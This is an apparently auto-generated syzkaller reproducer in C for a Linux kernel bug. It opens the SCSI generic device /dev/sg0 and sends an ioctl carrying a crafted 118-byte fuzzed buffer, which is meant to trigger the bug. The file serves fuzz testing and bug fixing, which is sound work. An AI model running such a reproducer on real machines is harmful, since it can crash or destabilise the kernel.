// https://syzkaller.appspot.com/bug?id=6b8d6b1847122db76e4ebd32b9d580684bac133c
// autogenerated by syzkaller (http://github.com/google/syzkaller)

#define _GNU_SOURCE
#include <endian.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <unistd.h>

static uintptr_t syz_open_dev(uintptr_t a0, uintptr_t a1, uintptr_t a2)
{
  if (a0 == 0xc || a0 == 0xb) {
    char buf[128];
    sprintf(buf, "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block", (uint8_t)a1,
            (uint8_t)a2);
    return open(buf, O_RDWR, 0);
  } else {
    char buf[1024];
    char* hash;
    strncpy(buf, (char*)a0, sizeof(buf));
    buf[sizeof(buf) - 1] = 0;
    while ((hash = strchr(buf, '#'))) {
      *hash = '0' + (char)(a1 % 10);
      a1 /= 10;
    }
    return open(buf, a2, 0);
  }
}

long r[1];
void loop()
{
  memset(r, -1, sizeof(r));
  syscall(__NR_mmap, 0x20000000, 0x7000, 3, 0x32, -1, 0);
  memcpy((void*)0x20000000, "/dev/sg#", 9);
  r[0] = syz_open_dev(0x20000000, 0, 0);
  memcpy((void*)0x20001f8a,
         "\xf9\xda\x28\x06\x6d\xb5\xd5\xf8\xaf\xd8\xcf\xc6\x33\xff\x20\x6e\xef"
         "\x50\xe6\x78\x98\xb4\x2e\x5a\x8c\xb1\x6d\x6b\x4d\x5a\x92\x1f\x0c\x00"
         "\x00\x00\x01\x00\x00\x00\x01\x5b\xd8\x9b\x97\x9c\xd9\xf6\x84\x2a\xca"
         "\x1c\xe0\xf7\xcf\xf7\xad\x5f\xa9\xf5\x29\xea\xe6\xb5\x4d\xf3\x45\x95"
         "\x37\xfd\x96\x21\x6c\xa5\x83\x33\xe2\x14\x7c\x5a\xc7\x78\xab\x1f\x68"
         "\x0a\x27\x61\xea\x3b\xb2\x0a\xbe\x0f\xbe\xf2\x63\xbb\x5d\x16\x85\x42"
         "\x62\x4f\x89\x82\x83\x36\x9d\xdf\x1a\xc2\xb9\xe6\x50\x63\x7e\x7f",
         118);
  syscall(__NR_ioctl, r[0], 0xc0481273, 0x20001f8a);
}

int main()
{
  loop();
  return 0;
}